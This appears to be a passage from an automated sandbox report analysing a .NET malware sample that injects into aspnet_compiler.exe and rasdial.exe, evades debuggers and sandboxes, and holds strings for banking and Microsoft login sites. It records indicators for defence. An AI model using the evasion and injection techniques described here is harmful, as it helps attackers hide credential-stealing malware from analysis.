            Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: x.exe, 00000000.00000002.3320685418.0000000003212000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.000000000320A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3326631690.0000000006450000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000003.1891422304.0000000004945000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3318447334.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1889576248.000000000479E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: aspnet_compiler.exe, 00000003.00000002.1889491293.0000000001628000.00000004.00000020.00020000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000002.3317911135.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdb source: x.exe
            Source: Binary string: aspnet_compiler.pdb source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.3319482531.000000000511C000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000002FBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2177618283.0000000013F4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BXCJKS1233.pdbBSJB source: x.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: x.exe, c4b3fc756b99a7f509fc28017328f4772.cs.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
            Source: x.exe, c223cf0b3e0150ecc4644dddecdf385fe.cs.Net Code: c4257aa7c135aa5bdeddfb4af573820e0 System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\x.exeCode function: 0_2_017E00F5 pushfd ; iretd 0_2_017E00FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00401820 push edx; ret 3_2_00401859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0041A08F push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0041A093 push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0041A154 push ecx; retf 3_2_0041A0F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004111F7 push edi; retf 3_2_0041120A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00418A64 push esp; retn 0045h3_2_00418A75
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0040D20A push ecx; iretd 3_2_0040D20E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00408292 pushfd ; ret 3_2_0040829A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00403300 push eax; ret 3_2_00403302
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00411309 push edi; retf 3_2_0041130C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0041E3A5 push eax; iretd 3_2_0041E3CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004114E3 push esi; iretd 3_2_004114EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00404D01 push eax; iretd 3_2_00404D11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00412DC3 push esi; ret 3_2_00412DCE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004015D1 push edx; ret 3_2_004015D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_004015E4 push edx; ret 3_2_004015E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00401631 push edx; ret 3_2_00401634
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A8225F pushad ; ret 3_2_01A827F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A827FA pushad ; ret 3_2_01A827F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB09AD push ecx; mov dword ptr [esp], ecx3_2_01AB09B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A8283D push eax; iretd 3_2_01A82858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01A81368 push eax; iretd 3_2_01A81369
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599678E push ecx; iretd 5_2_05996792
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A1FE8 push esp; retn 0045h5_2_059A1FF9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599A77B push edi; retf 5_2_0599A78E
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A36D8 push ecx; retf 5_2_059A3675
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A3613 push ecx; retf 5_2_059A3675
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F1DC push FFFFFF87h; retf 5_2_0599F1E9
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_0599F1D7 push edx; ret 5_2_0599F1DA
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeCode function: 5_2_059A7929 push eax; iretd 5_2_059A794F
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\x.exeMemory allocated: 17A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\x.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\x.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E rdtsc 3_2_01AF096E
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 428Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9544Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\x.exe TID: 4536Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\x.exe TID: 3760Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\x.exe TID: 4536Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308Thread sleep count: 428 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308Thread sleep time: -856000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308Thread sleep count: 9544 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 1308Thread sleep time: -19088000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe TID: 4568Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe TID: 4568Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02C5BFE0 FindFirstFileW,FindNextFileW,FindClose,6_2_02C5BFE0
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 600000Jump to behavior
            Source: 48663I1M.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 48663I1M.6.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 48663I1M.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 48663I1M.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 48663I1M.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 48663I1M.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 48663I1M.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 48663I1M.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: x.exe, 00000000.00000002.3316517414.000000000152F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 48663I1M.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 48663I1M.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 48663I1M.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: 48663I1M.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: crUcuBAsmdG.exe, 00000009.00000002.3318007528.00000000010BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: firefox.exe, 0000000A.00000002.2179079770.0000028713EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\AgP
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 48663I1M.6.drBinary or memory string: global block list test formVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 48663I1M.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 48663I1M.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 48663I1M.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 48663I1M.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 48663I1M.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 48663I1M.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\x.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E rdtsc 3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_00417233 LdrLoadDll,3_2_00417233
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF0185 mov eax, dword ptr fs:[00000030h]3_2_01AF0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3019F mov eax, dword ptr fs:[00000030h]3_2_01B3019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]3_2_01B54180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B54180 mov eax, dword ptr fs:[00000030h]3_2_01B54180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAA197 mov eax, dword ptr fs:[00000030h]3_2_01AAA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]3_2_01B6C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B6C188 mov eax, dword ptr fs:[00000030h]3_2_01B6C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE01F8 mov eax, dword ptr fs:[00000030h]3_2_01AE01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B861E5 mov eax, dword ptr fs:[00000030h]3_2_01B861E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E1D0 mov eax, dword ptr fs:[00000030h]3_2_01B2E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B761C3 mov eax, dword ptr fs:[00000030h]3_2_01B761C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0124 mov eax, dword ptr fs:[00000030h]3_2_01AE0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B70115 mov eax, dword ptr fs:[00000030h]3_2_01B70115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov ecx, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5A118 mov eax, dword ptr fs:[00000030h]3_2_01B5A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov eax, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5E10E mov ecx, dword ptr fs:[00000030h]3_2_01B5E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84164 mov eax, dword ptr fs:[00000030h]3_2_01B84164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B48158 mov eax, dword ptr fs:[00000030h]3_2_01B48158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov ecx, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B44144 mov eax, dword ptr fs:[00000030h]3_2_01B44144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AAC156 mov eax, dword ptr fs:[00000030h]3_2_01AAC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB6154 mov eax, dword ptr fs:[00000030h]3_2_01AB6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA80A0 mov eax, dword ptr fs:[00000030h]3_2_01AA80A0
